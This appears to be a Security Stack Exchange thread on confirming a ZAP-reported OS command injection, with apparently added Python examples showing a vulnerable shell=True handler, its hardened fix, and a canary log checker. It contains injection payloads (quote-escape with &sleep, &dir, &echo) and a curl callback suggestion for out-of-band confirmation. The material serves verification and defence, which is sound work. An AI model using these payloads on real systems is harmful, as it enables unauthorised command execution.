4

ZAP scanner found Remote OS command injection.

Is there any foolproof way to check if this works and is not a false positive?

I have tried to make it sleep 50 seconds, but it's not something I can visually see; also, the page does not seem to take longer to load.

This is the URL the scanner found vulnerable:

http://*SECRET*/*SECRET*?from&to

This is the exploit:

Attack: ACG"&sleep 5s&"

So I assume I should write the URL like this to exploit it:

http://*SECRET*/*SECRET*?from=ACG&sleep 5s&to=AMR

The above does not appear to make the page take longer to load. Either I made a typo, or perhaps it is not vulnerable, as the URL gets sanitized to:

ACG&sleep%205s&to=AMR
techraf
k1308517

2 Answers

6

Automatic vulnerability scanners often produce false positives with timing based payloads.

This is because the scanner only checks if the request takes longer than the injected pause. If there is high network traffic - possibly because your scanner produces a lot of requests - this may happen even though the payload was not executed.

This means that you should always manually confirm timing based payloads (as you should confirm any other findings).

It's not quite clear to me what the actual payload is here. There are really two possibilities:

  • & is meant to be encoded, so the query string would be: ?from=ACG%22%26sleep%205s%26%22&to=AMR. This is the likely case. The vulnerable parameter would be from, and the payload would be ACG%22%26sleep%205s%26%22. It would exit the current string context via ", then add an additional command via & (which can be used to add additional commands in Windows and Linux), and finally get rid of the trailing " by adding another command via &.
  • & is not meant to be encoded, so you would add an additional parameter named sleep%005s with no value (less likely, but still possible).

You should try out both variants, first with a command that produces a visible result - such as id, ls, dir, etc - and then with a timing command such as sleep.

tim
  • http://*SECRET*/*SECRET*?from=ACG%22%26dir%26%22&to=AMR I tried this, as well as sleep but nothing seems to happen or get displayed. Have I made a mistake? – k1308517 Mar 30 '16 at 12:39
  • 2
    @k1308517 no, looks good. Like I said, it's probably a false positive anyways. If you want to make sure, I would take a look at the source code (if you have it). – tim Mar 30 '16 at 12:45
  • You posted two examples, I didn't really get the other one. Mind posting a example using my *SECRET* URL above? – k1308517 Mar 30 '16 at 15:16
  • 1
    @k1308517 the second point is the example you use in your question: `http://*SECRET*/*SECRET*?from=ACG&sleep 5s&to=AMR `. – tim Mar 30 '16 at 15:27
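The string-context escape described in the first bullet above, shown against a deliberately minimal handler so the mechanism and its fix can be seen side by side. This is an added example, not code from the question's application or from either answer: the handler itself, `echo` standing in for whatever backend tool the real page calls, the three-letter allowlist, and the `echo INJECTED` marker (a constructed harmless payload with the same `"&...&"` shape as the scanner's `ACG"&sleep 5s&"`, chosen so the effect shows up in output instead of timing) are all assumptions.

```python
import re
import subprocess

# Values from the question, plus a constructed payload of the same shape as the
# scanner's: close the quoted string with ", chain a command with &, and use a
# second & so the template's trailing " becomes the start of a separate (empty) command.
BENIGN_FROM, BENIGN_TO = "ACG", "AMR"
INJECTED_FROM = 'ACG"&echo INJECTED&"'

# Assumed format of the from/to parameters (three upper-case letters, like ACG/AMR).
CODE_RE = re.compile(r"[A-Z]{3}")


def build_vulnerable_command(frm: str, to: str) -> str:
    """The exact string the vulnerable handler hands to /bin/sh. Exposed on its
    own so a reviewer can see where the quoting breaks without running it."""
    return f'echo "{frm}" "{to}"'


def run_report_vulnerable(frm: str, to: str) -> str:
    """Hypothetical vulnerable handler: query parameters are interpolated into a
    shell command string and run with shell=True, so the template's quotes are
    the only thing separating data from command syntax."""
    proc = subprocess.run(build_vulnerable_command(frm, to),
                          shell=True, capture_output=True, text=True)
    return proc.stdout


def run_report_argv_only(frm: str, to: str) -> str:
    """Half of the fix: pass the parameters as an argv list, so no shell parses
    them. Even the payload arrives as one literal argument."""
    proc = subprocess.run(["echo", frm, to], capture_output=True, text=True, check=True)
    return proc.stdout


def run_report_hardened(frm: str, to: str) -> str:
    """Both halves of the fix: allowlist-validate each parameter, then call the
    tool with an argv list. The allowlist rejects anything that is not a code
    early; the argv form means a value that ever slipped through is still data."""
    for name, value in (("from", frm), ("to", to)):
        if not CODE_RE.fullmatch(value):
            raise ValueError(f"invalid {name} parameter: {value!r}")
    return run_report_argv_only(frm, to)


if __name__ == "__main__":
    print(build_vulnerable_command(INJECTED_FROM, BENIGN_TO))
    print(run_report_vulnerable(INJECTED_FROM, BENIGN_TO))   # INJECTED appears in output
    print(run_report_argv_only(INJECTED_FROM, BENIGN_TO))    # payload echoed literally
    print(run_report_hardened(BENIGN_FROM, BENIGN_TO))
```

The vulnerable run prints `ACG` and `INJECTED` (in either order, since both commands are backgrounded by `&`) and `/bin/sh` complains about the empty command that the orphaned `""` becomes; that complaint on stderr is exactly the kind of trace to look for in application logs when a scanner reports this class of finding. The argv-only variant shows why the injected text is harmless once no shell is involved, and the hardened variant adds the allowlist so malformed input is rejected before any process is started.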
1

sleep only puts the thread to sleep, if at all. Try something like

curl your.server.tld/whatever

and see if the request comes through in your server logs.

This might not be conclusive if the request does not come through, though.

External traffic could be blocked or curl not installed or anything else could go wrong.

Tobi Nary
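Checking the server logs for the callback this answer describes, as an added example that is not part of the answer: the canary token, the log lines and the addresses are constructed, and the format assumed is the usual combined access-log format written by Apache and nginx. The point of the `sent_at` filter is to count only hits logged after the probe was sent, and the verdict deliberately distinguishes "confirmed" from "inconclusive", because, as the answer notes, a missing callback proves nothing on its own.

```python
import re
from datetime import datetime
from typing import Optional

# Constructed sample in combined log format. The second line is what a
# successful out-of-band callback (curl fetching the canary path) would look like.
CANARY_TOKEN = "c4n4ry-7f3a"  # assumed per-test random token, generated fresh each time
SAMPLE_LOG = """\
203.0.113.7 - - [30/Mar/2016:12:39:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [30/Mar/2016:12:39:04 +0000] "GET /c4n4ry-7f3a HTTP/1.1" 404 153 "-" "curl/7.47.0"
203.0.113.7 - - [30/Mar/2016:12:39:09 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_ts(text: str) -> datetime:
    """Parse a combined-log timestamp such as '30/Mar/2016:12:39:04 +0000'."""
    return datetime.strptime(text, TS_FORMAT)


def parse_line(line: str) -> Optional[dict]:
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = parse_ts(rec["ts"])
    return rec


def find_canary_hits(log_text: str, token: str,
                     sent_at: Optional[datetime] = None) -> list:
    """Collect requests for /<token>, ignoring any logged before the probe was sent.
    The HTTP status is irrelevant: a 404 for the canary path is still a hit."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].split("?", 1)[0] != "/" + token:
            continue
        if sent_at is not None and rec["ts"] < sent_at:
            continue
        hits.append(rec)
    return hits


def verdict(hits: list) -> str:
    """A callback proves execution; no callback proves nothing (egress blocked,
    curl missing, wrong host), so it is reported as inconclusive, not negative."""
    return "confirmed" if hits else "inconclusive"


if __name__ == "__main__":
    found = find_canary_hits(SAMPLE_LOG, CANARY_TOKEN, parse_ts("30/Mar/2016:12:39:00 +0000"))
    for h in found:
        print(f"{h['ts'].isoformat()} {h['ip']} {h['ua']}")
    print(verdict(found))
```

Two details matter in practice: use a token that is unique per probe so an old hit from a previous test run cannot be mistaken for a new one, and record the user agent and source address of the hit, which tell you which host actually executed the command (the web server itself, or a backend behind it).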